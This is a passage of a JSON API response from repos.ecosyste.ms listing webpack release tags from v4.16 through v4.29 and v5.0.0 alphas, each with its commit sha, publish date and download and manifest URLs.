https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webp